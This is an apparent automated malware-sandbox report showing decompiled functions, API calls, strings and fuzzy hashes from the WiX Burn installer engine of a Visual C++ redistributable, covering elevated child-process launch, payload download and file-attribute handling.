                                                                          • String ID: @Met$Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                          • API String ID: 1811509786-2510125051
                                                                          • Opcode ID: 1e71567c4eb4a155cfe6077ef08c3ab74a4fb2c320974c2d69ab086c47792b28
                                                                          • Instruction ID: 50b7077c44cb5378f3401cb05fa8019940971c689a06eca070710e25247010a6
                                                                          • Opcode Fuzzy Hash: 1e71567c4eb4a155cfe6077ef08c3ab74a4fb2c320974c2d69ab086c47792b28
                                                                          • Instruction Fuzzy Hash: 7A214B32E44718BBDB116AA4DE42AEFB7A9EF14310F204322FD00E5191E7719E90D7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00024ED2 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E00024ED2(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* __edi;
				long _t26;
				char* _t32;
				void* _t43;
				intOrPtr* _t46;
				void* _t47;

				_t26 = GetCurrentProcessId();
				_t46 = _a8;
				_push(_t26);
				_v12 = 0;
				_v16 = 0;
				_push( *((intOrPtr*)(_t46 + 4)));
				_v20 = 0;
				_push( *_t46);
				_v8 = 0;
				_t47 = E00011F20( &_v12, L"-q -%ls %ls %ls %u", L"burn.elevated");
				if(_t47 >= 0) {
					E000539CD( &_v16,  &_v20);
					if(_v16 < 5) {
						L5:
						_t32 = L"open";
					} else {
						_t32 = L"runas";
						if(_a12 == 0) {
							goto L5;
						}
					}
					_t47 = E00053B4A(_t46, _a4, _v12, _t32, 0, 0, _a16,  &_v8);
					if(_t47 >= 0) {
						 *((intOrPtr*)(_t46 + 8)) = GetProcessId(_v8);
						_t43 = 0;
						 *((intOrPtr*)(_t46 + 0xc)) = _v8;
						_v8 = 0;
					} else {
						E0005012F(_t47, "Failed to launch elevated child process: %ls", _a4);
						goto L2;
					}
				} else {
					_push("Failed to allocate parameters for elevated process.");
					_push(_t47);
					E0005012F();
					L2:
					_t43 = _v8;
				}
				if(_t43 != 0) {
					CloseHandle(_t43);
					_v8 = 0;
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				return _t47;
			}













                                                                          0x00024edb
                                                                          0x00024ee1
                                                                          0x00024ee6
                                                                          0x00024eea
                                                                          0x00024eed
                                                                          0x00024ef0
                                                                          0x00024ef3
                                                                          0x00024ef6
                                                                          0x00024ef8
                                                                          0x00024f0b
                                                                          0x00024f12
                                                                          0x00024f2e
                                                                          0x00024f37
                                                                          0x00024f43
                                                                          0x00024f43
                                                                          0x00024f39
                                                                          0x00024f39
                                                                          0x00024f41
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00024f41
                                                                          0x00024f5d
                                                                          0x00024f61
                                                                          0x00024f7f
                                                                          0x00024f82
                                                                          0x00024f87
                                                                          0x00024f8a
                                                                          0x00024f63
                                                                          0x00024f6c
                                                                          0x00000000
                                                                          0x00024f71
                                                                          0x00024f14
                                                                          0x00024f14
                                                                          0x00024f19
                                                                          0x00024f1a
                                                                          0x00024f21
                                                                          0x00024f21
                                                                          0x00024f21
                                                                          0x00024f8f
                                                                          0x00024f92
                                                                          0x00024f98
                                                                          0x00024f98
                                                                          0x00024f9e
                                                                          0x00024fa3
                                                                          0x00024fa3
                                                                          0x00024fb0

                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0005B4F0), ref: 00024EDB
                                                                          • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00024F79
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00024F92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCurrentHandle
                                                                          • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                          • API String ID: 2815245435-1352204306
                                                                          • Opcode ID: a40ac446286567db880ea5f013925570d302d9767d0e2ee55af96a963d6da85a
                                                                          • Instruction ID: ae8a28aaf2fa7c38f754da7faa15cd1e7246f7c4ab3ba49ad4941d10cb630fae
                                                                          • Opcode Fuzzy Hash: a40ac446286567db880ea5f013925570d302d9767d0e2ee55af96a963d6da85a
                                                                          • Instruction Fuzzy Hash: E5219C75D00229BFDF01DF94DD818EEBBB9EF04351B10817AF904A6241C775AF109B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002AB3C Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsSetValue.KERNEL32(?,?), ref: 0002AB53
                                                                          • GetLastError.KERNEL32 ref: 0002AB5D
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 0002AB9C
                                                                          • CoUninitialize.OLE32(?,0002C4F4,?,?), ref: 0002ABD9
                                                                          Strings
                                                                          • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0002AB8B
                                                                          • elevation.cpp, xrefs: 0002AB81
                                                                          • Failed to initialize COM., xrefs: 0002ABA8
                                                                          • Failed to pump messages in child process., xrefs: 0002ABC7
                                                                          • @Met, xrefs: 0002AB5D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInitializeLastUninitializeValue
                                                                          • String ID: @Met$Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                          • API String ID: 876858697-3541924490
                                                                          • Opcode ID: 9f158e2ae685a844a1b8eec0bd3c1dd3cbff0352e5c205182bc806f507379490
                                                                          • Instruction ID: 4a07158e539f20f62c3489108a9648b2c8c4a0afa49d31ca531d1c528a750d73
                                                                          • Opcode Fuzzy Hash: 9f158e2ae685a844a1b8eec0bd3c1dd3cbff0352e5c205182bc806f507379490
                                                                          • Instruction Fuzzy Hash: 85115932A00B31BBA7221765EC05DAFBA99EF05721B004116FD04F7151EF60AD00D7E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002F3E6 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 40%
                                                                          			E0002F3E6(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				intOrPtr* _t41;
				intOrPtr* _t46;
				intOrPtr* _t49;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr* _t71;
				intOrPtr* _t72;
				signed int* _t75;
				void* _t77;

				_t62 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t60 = _a4;
				_v12 = 0;
				_v8 = 0;
				EnterCriticalSection( *(_t60 + 0xc));
				_t77 = E0001D459( *(_t60 + 0xc) + 0xb8);
				if(_t77 >= 0) {
					_t71 = _a12;
					if(_t71 == 0 ||  *_t71 == 0) {
						_t72 = _a8;
						if(_t72 == 0 ||  *_t72 == 0) {
							_t77 = 0x80070057;
							_push("UX did not provide container or payload id.");
							goto L34;
						} else {
							_t77 = E0001C0A9(_t62,  *(_t60 + 0xc) + 0x2a8, _t72,  &_v12);
							if(_t77 >= 0) {
								_t75 = _v12 + 0x2c;
								goto L15;
							}
							_push(_t72);
							_push("UX requested unknown container with id: %ls");
							goto L13;
						}
					} else {
						_t77 = E0001CC57(_t62,  *(_t60 + 0xc) + 0x2b8, _t71,  &_v8);
						if(_t77 >= 0) {
							_t57 = _v8;
							if( *((intOrPtr*)(_t57 + 4)) != 2) {
								_t75 = _t57 + 0x40;
								L15:
								_t41 = _a16;
								if(_t41 == 0 ||  *_t41 == 0) {
									if( *_t75 != 0) {
										E000554EF( *_t75);
										 *_t75 =  *_t75 & 0x00000000;
									}
									goto L29;
								} else {
									_t77 = E000121A5(_t75, _t41, 0);
									if(_t77 >= 0) {
										_t46 = _a20;
										if(_t46 == 0 ||  *_t46 == 0) {
											L29:
											if(_t75[1] != 0) {
												E000554EF(_t75[1]);
												_t75[1] = _t75[1] & 0x00000000;
											}
											goto L31;
										} else {
											_t77 = E000121A5( &(_t75[1]), _t46, 0);
											if(_t77 >= 0) {
												_t49 = _a24;
												if(_t49 == 0 ||  *_t49 == 0) {
													L31:
													if(_t75[2] != 0) {
														E000554EF(_t75[2]);
														_t75[2] = _t75[2] & 0x00000000;
													}
												} else {
													_t77 = E000121A5( &(_t75[2]), _t49, 0);
													if(_t77 >= 0) {
														goto L35;
													}
													_push("Failed to set download password.");
													L34:
													_push(_t77);
													E0005012F();
												}
												goto L35;
											}
											_push("Failed to set download user.");
											goto L34;
										}
									}
									_push("Failed to set download URL.");
									goto L34;
								}
							}
							_push(_t71);
							_t77 = 0x800710dd;
							_push("UX denied while trying to set download URL on embedded payload: %ls");
							goto L13;
						} else {
							_push(_t71);
							_push("UX requested unknown payload with id: %ls");
							L13:
							_push(_t77);
							E0005012F();
							L35:
							goto L36;
						}
					}
				} else {
					_push("Engine is active, cannot change engine state.");
					_push(_t77);
					E0005012F();
					L36:
					LeaveCriticalSection( *(_t60 + 0xc));
					return _t77;
				}
			}














                                                                          0x0002f3e6
                                                                          0x0002f3e9
                                                                          0x0002f3ea
                                                                          0x0002f3ec
                                                                          0x0002f3f2
                                                                          0x0002f3f5
                                                                          0x0002f3fb
                                                                          0x0002f40f
                                                                          0x0002f413
                                                                          0x0002f428
                                                                          0x0002f42f
                                                                          0x0002f472
                                                                          0x0002f477
                                                                          0x0002f560
                                                                          0x0002f565
                                                                          0x00000000
                                                                          0x0002f486
                                                                          0x0002f499
                                                                          0x0002f49d
                                                                          0x0002f4b6
                                                                          0x00000000
                                                                          0x0002f4b6
                                                                          0x0002f49f
                                                                          0x0002f4a0
                                                                          0x00000000
                                                                          0x0002f4a0
                                                                          0x0002f436
                                                                          0x0002f449
                                                                          0x0002f44d
                                                                          0x0002f457
                                                                          0x0002f45e
                                                                          0x0002f46d
                                                                          0x0002f4b9
                                                                          0x0002f4b9
                                                                          0x0002f4be
                                                                          0x0002f52e
                                                                          0x0002f532
                                                                          0x0002f537
                                                                          0x0002f537
                                                                          0x00000000
                                                                          0x0002f4c7
                                                                          0x0002f4cf
                                                                          0x0002f4d3
                                                                          0x0002f4df
                                                                          0x0002f4e4
                                                                          0x0002f53a
                                                                          0x0002f53e
                                                                          0x0002f543
                                                                          0x0002f548
                                                                          0x0002f548
                                                                          0x00000000
                                                                          0x0002f4ed
                                                                          0x0002f4f8
                                                                          0x0002f4fc
                                                                          0x0002f505
                                                                          0x0002f50a
                                                                          0x0002f54c
                                                                          0x0002f550
                                                                          0x0002f555
                                                                          0x0002f55a
                                                                          0x0002f55a
                                                                          0x0002f513
                                                                          0x0002f51e
                                                                          0x0002f522
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002f524
                                                                          0x0002f56a
                                                                          0x0002f56a
                                                                          0x0002f56b
                                                                          0x0002f571
                                                                          0x00000000
                                                                          0x0002f50a
                                                                          0x0002f4fe
                                                                          0x00000000
                                                                          0x0002f4fe
                                                                          0x0002f4e4
                                                                          0x0002f4d5
                                                                          0x00000000
                                                                          0x0002f4d5
                                                                          0x0002f4be
                                                                          0x0002f460
                                                                          0x0002f461
                                                                          0x0002f466
                                                                          0x00000000
                                                                          0x0002f44f
                                                                          0x0002f44f
                                                                          0x0002f450
                                                                          0x0002f4a5
                                                                          0x0002f4a5
                                                                          0x0002f4a6
                                                                          0x0002f572
                                                                          0x00000000
                                                                          0x0002f572
                                                                          0x0002f44d
                                                                          0x0002f415
                                                                          0x0002f415
                                                                          0x0002f41a
                                                                          0x0002f41b
                                                                          0x0002f573
                                                                          0x0002f576
                                                                          0x0002f583
                                                                          0x0002f583

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0002F3FB
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0002F576
                                                                          Strings
                                                                          • UX did not provide container or payload id., xrefs: 0002F565
                                                                          • user is active, cannot change user state., xrefs: 0002F415
                                                                          • Failed to set download URL., xrefs: 0002F4D5
                                                                          • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0002F466
                                                                          • Failed to set download password., xrefs: 0002F524
                                                                          • Failed to set download user., xrefs: 0002F4FE
                                                                          • UX requested unknown container with id: %ls, xrefs: 0002F4A0
                                                                          • UX requested unknown payload with id: %ls, xrefs: 0002F450
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: user is active, cannot change user state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                          • API String ID: 3168844106-2615595102
                                                                          • Opcode ID: 416329033e5bad91692d4da48262db6fc49380c6e15df7fda89f4f1c3b307914
                                                                          • Instruction ID: 3a7fa2b761b5eb2362755a206d5055ad1f2eb3f7f29fd31186f23c424375ca37
                                                                          • Opcode Fuzzy Hash: 416329033e5bad91692d4da48262db6fc49380c6e15df7fda89f4f1c3b307914
                                                                          • Instruction Fuzzy Hash: FC41E571A00A33BBDB61AE24E805ABBB3B8EF01751F148175FA05EB241DB74ED40CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003A024 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 172COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 87%
                                                                          			E0003A024(intOrPtr* _a4, WCHAR* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t68;
				intOrPtr* _t72;
				void* _t79;
				signed int _t83;
				long _t84;
				signed short _t86;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t98;
				intOrPtr* _t99;
				void* _t100;
				WCHAR* _t103;
				intOrPtr* _t104;
				void* _t105;

				_v8 = _v8 & 0x00000000;
				_t62 = 0x5b524;
				_t104 = _a4;
				_v12 = 0x5b524;
				_t5 = _t104 + 4; // 0x75c08524
				_t95 =  *_t5;
				if(_t95 == 0) {
					_t6 = _t104 + 8; // 0x2c453905
					_t98 =  *_t6;
					if(_t98 != 0) {
						_t62 =  *_t98;
					}
				} else {
					_t62 =  *_t95;
				}
				_t7 = _t104 + 0xc; // 0x458b3e74
				_t99 =  *_t7;
				_a4 = _t62;
				if(_t99 != 0) {
					_v12 =  *_t99;
				}
				_t10 = _t95 + 0x2c; // 0x75c08550
				_t94 = _t10;
				if(_t95 != 0) {
					_v20 =  *((intOrPtr*)(_t95 + 0x18));
					_t64 =  *((intOrPtr*)(_t95 + 0x1c));
				} else {
					_t12 = _t99 + 0x40; // 0x458b3eb4
					_t94 = _t12;
					_v20 =  *((intOrPtr*)(_t99 + 0x10));
					_t64 =  *((intOrPtr*)(_t99 + 0x14));
				}
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v16 = _t64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(_t95 == 0) {
					_t68 =  !=  ? 0x20000152 : 0x2000014f;
				} else {
					_t68 = (0 | _t99 != 0x00000000) + 0x20000150;
				}
				_push( *_t94);
				_push("download");
				_push(_v12);
				E0001550F(2, _t68, _a4);
				_t103 = _a8;
				if(E00054315(_t103,  &_v8) == 0) {
					L16:
					_v36 = _v36 & 0x00000000;
					_v40 = E0003993C;
					_v32 = _t104;
					_t72 =  *_t94;
					_t97 = 0x62;
					if(_t97 !=  *_t72) {
						L24:
						_v52 =  *_t104;
						_v48 = _a4;
						_v44 = _v12;
						_v24 =  &_v52;
						_v28 = E00039855;
						_t79 = E0005635A(_t97, _t94, _v20, _v16, _t103,  &_v40,  &_v28);
						L25:
						_t105 = _t79;
						if(_t105 < 0) {
							_push(_t103);
							E0005012F(_t105, "Failed attempt to download URL: \'%ls\' to: \'%ls\'",  *_t94);
						}
						goto L27;
					}
					_t97 = 0x69;
					if(_t97 !=  *((intOrPtr*)(_t72 + 2))) {
						goto L24;
					}
					_t97 = 0x74;
					if(_t97 !=  *((intOrPtr*)(_t72 + 4))) {
						goto L24;
					}
					_t100 = 0x73;
					if(_t100 !=  *((intOrPtr*)(_t72 + 6))) {
						goto L24;
					}
					_t97 =  *(_t72 + 8) & 0x0000ffff;
					_a8 = 0x3a;
					if(_a8 == _t97) {
						L23:
						_t79 = E0003DC0D(_t100,  &_v40, _t94, _t103);
						goto L25;
					}
					if(_t100 != _t97) {
						goto L24;
					}
					_t97 = _a8;
					if(_a8 !=  *((intOrPtr*)(_t72 + 0xa))) {
						goto L24;
					}
					goto L23;
				} else {
					_t83 = _v8;
					if((_t83 & 0x00000001) == 0) {
						goto L16;
					}
					_t84 = _t83 & 0xfffffffe;
					_v8 = _t84;
					if(SetFileAttributesW(_t103, _t84) != 0) {
						goto L16;
					}
					_t86 = GetLastError();
					_t108 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
					_t105 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "apply.cpp", 0x568, _t105);
					E0005012F(_t105, "Failed to clear readonly bit on payload destination path: %ls", _t103);
					L27:
					return _t105;
				}
			}































                                                                          0x0003a02a
                                                                          0x0003a02e
                                                                          0x0003a035
                                                                          0x0003a039
                                                                          0x0003a03c
                                                                          0x0003a03c
                                                                          0x0003a041
                                                                          0x0003a047
                                                                          0x0003a047
                                                                          0x0003a04c
                                                                          0x0003a04e
                                                                          0x0003a04e
                                                                          0x0003a043
                                                                          0x0003a043
                                                                          0x0003a043
                                                                          0x0003a050
                                                                          0x0003a050
                                                                          0x0003a053
                                                                          0x0003a058
                                                                          0x0003a05c
                                                                          0x0003a05c
                                                                          0x0003a05f
                                                                          0x0003a05f
                                                                          0x0003a064
                                                                          0x0003a0a2
                                                                          0x0003a0a5
                                                                          0x0003a066
                                                                          0x0003a069
                                                                          0x0003a069
                                                                          0x0003a06c
                                                                          0x0003a06f
                                                                          0x0003a06f
                                                                          0x0003a072
                                                                          0x0003a079
                                                                          0x0003a07d
                                                                          0x0003a082
                                                                          0x0003a083
                                                                          0x0003a084
                                                                          0x0003a08a
                                                                          0x0003a08b
                                                                          0x0003a08c
                                                                          0x0003a08f
                                                                          0x0003a0b6
                                                                          0x0003a091
                                                                          0x0003a098
                                                                          0x0003a098
                                                                          0x0003a0b9
                                                                          0x0003a0bb
                                                                          0x0003a0c0
                                                                          0x0003a0c9
                                                                          0x0003a0ce
                                                                          0x0003a0e0
                                                                          0x0003a13d
                                                                          0x0003a13d
                                                                          0x0003a141
                                                                          0x0003a148
                                                                          0x0003a14b
                                                                          0x0003a14f
                                                                          0x0003a153
                                                                          0x0003a19c
                                                                          0x0003a19e
                                                                          0x0003a1a4
                                                                          0x0003a1aa
                                                                          0x0003a1b0
                                                                          0x0003a1ba
                                                                          0x0003a1ca
                                                                          0x0003a1cf
                                                                          0x0003a1cf
                                                                          0x0003a1d3
                                                                          0x0003a1d5
                                                                          0x0003a1de
                                                                          0x0003a1e3
                                                                          0x00000000
                                                                          0x0003a1d3
                                                                          0x0003a157
                                                                          0x0003a15c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a160
                                                                          0x0003a165
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a169
                                                                          0x0003a16e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a170
                                                                          0x0003a174
                                                                          0x0003a17f
                                                                          0x0003a18f
                                                                          0x0003a195
                                                                          0x00000000
                                                                          0x0003a195
                                                                          0x0003a184
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a186
                                                                          0x0003a18d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a0e2
                                                                          0x0003a0e2
                                                                          0x0003a0e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a0e9
                                                                          0x0003a0ee
                                                                          0x0003a0f9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003a0fb
                                                                          0x0003a10c
                                                                          0x0003a116
                                                                          0x0003a124
                                                                          0x0003a130
                                                                          0x0003a1e7
                                                                          0x0003a1ee
                                                                          0x0003a1ee

                                                                          APIs
                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000001,00000000,?), ref: 0003A0F1
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0003A0FB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLast
                                                                          • String ID: :$@Met$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                          • API String ID: 1799206407-517928513
                                                                          • Opcode ID: dc8b1a42bffa74389d6c2943569e05b8f7bbb0ddeb1e50c581882a28be8e1b49
                                                                          • Instruction ID: 889529c396d36c25213b30d61b98721eebc15c665906ca6100f79286709f511c
                                                                          • Opcode Fuzzy Hash: dc8b1a42bffa74389d6c2943569e05b8f7bbb0ddeb1e50c581882a28be8e1b49
                                                                          • Instruction Fuzzy Hash: E2519E71A00209AFDB12DFA8C845AEFB7F9EF06710F108159E945EB251E775EE40CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005635A Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 152fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 40%
                                                                          			E0005635A(void* __ecx, intOrPtr* _a4, signed short _a8, WCHAR* _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v12;
				signed int _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				char _v28;
				signed short _v32;
				void* _v36;
				WCHAR* _v40;
				char _v44;
				signed int _t57;
				WCHAR* _t69;
				signed short _t78;
				WCHAR* _t85;
				void* _t88;
				intOrPtr* _t90;

				_t82 = __ecx;
				_v16 = _v16 | 0xffffffff;
				_t81 = _a4;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_t85 = 0;
				_v8 = 0;
				_v20 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x20], xmm0");
				_t88 = E000121A5( &_v12,  *_a4, 0);
				if(_t88 < 0) {
					L12:
					_t48 = _v20;
					if(_v20 != 0) {
						E000554EF(_t48);
					}
					if(_t85 != 0) {
						 *0x7a96c(_t85);
					}
					if(_v12 != 0) {
						E000554EF(_v12);
					}
					return _t88;
				}
				 *0x7a98c(L"Burn", 0, 0, 0, 0);
				_t85 = 0;
				if(0 != 0) {
					E000556B2(__ecx, L"WiX\\Burn", L"DownloadTimeout", 0x78,  &_v8);
					_t57 = _v8;
					if(_t57 != 0) {
						_t90 =  *0x7a970; // 0x5a79b
						_v8 = _t57 * 0x3e8;
						 *_t90(0, 2,  &_v8, 4);
						 *_t90(0, 6,  &_v8, 4);
						 *_t90(0, 5,  &_v8, 4);
					}
					_t88 = E00055BBF(_t82, _t85,  &_v12,  *((intOrPtr*)(_t81 + 4)),  *((intOrPtr*)(_t81 + 8)), _a24,  &_v36,  &_v44);
					if(_t88 >= 0) {
						E00055C68(_t82, _a16,  &_v20,  &_v16,  &_v28);
						_t88 = E00055916(_t85,  &_v12,  *((intOrPtr*)(_t81 + 4)),  *((intOrPtr*)(_t81 + 8)), _a16, _a8, _a12, _v36, _v32, _v28, _v24, _v16, _a20, _a24);
						if(_t88 >= 0) {
							_t69 = _v20;
							if(_t69 != 0 &&  *_t69 != 0) {
								DeleteFileW(_t69);
							}
						}
						if(_v16 != 0xffffffff) {
							CloseHandle(_v16);
						}
					}
				} else {
					_t78 = GetLastError();
					_t93 =  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
					_t88 =  >=  ? 0x80004005 :  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "dlutil.cpp", 0x84, _t88);
				}
			}



















                                                                          0x0005635a
                                                                          0x00056360
                                                                          0x00056367
                                                                          0x0005636a
                                                                          0x00056372
                                                                          0x00056375
                                                                          0x00056377
                                                                          0x0005637a
                                                                          0x0005637d
                                                                          0x00056380
                                                                          0x00056387
                                                                          0x0005638c
                                                                          0x00056396
                                                                          0x0005639a
                                                                          0x000564c3
                                                                          0x000564c3
                                                                          0x000564c8
                                                                          0x000564cb
                                                                          0x000564cb
                                                                          0x000564d2
                                                                          0x000564d5
                                                                          0x000564d5
                                                                          0x000564df
                                                                          0x000564e4
                                                                          0x000564e4
                                                                          0x000564f1
                                                                          0x000564f1
                                                                          0x000563ab
                                                                          0x000563b1
                                                                          0x000563b5
                                                                          0x000563fa
                                                                          0x000563ff
                                                                          0x00056404
                                                                          0x00056406
                                                                          0x00056414
                                                                          0x0005641e
                                                                          0x00056429
                                                                          0x00056434
                                                                          0x00056434
                                                                          0x00056451
                                                                          0x00056455
                                                                          0x00056466
                                                                          0x00056499
                                                                          0x0005649d
                                                                          0x0005649f
                                                                          0x000564a4
                                                                          0x000564ae
                                                                          0x000564ae
                                                                          0x000564a4
                                                                          0x000564b8
                                                                          0x000564bd
                                                                          0x000564bd
                                                                          0x000564b8
                                                                          0x000563b7
                                                                          0x000563b7
                                                                          0x000563c8
                                                                          0x000563d2
                                                                          0x000563e0
                                                                          0x000563e0

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000563B7
                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 000564AE
                                                                          • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 000564BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteErrorFileHandleLast
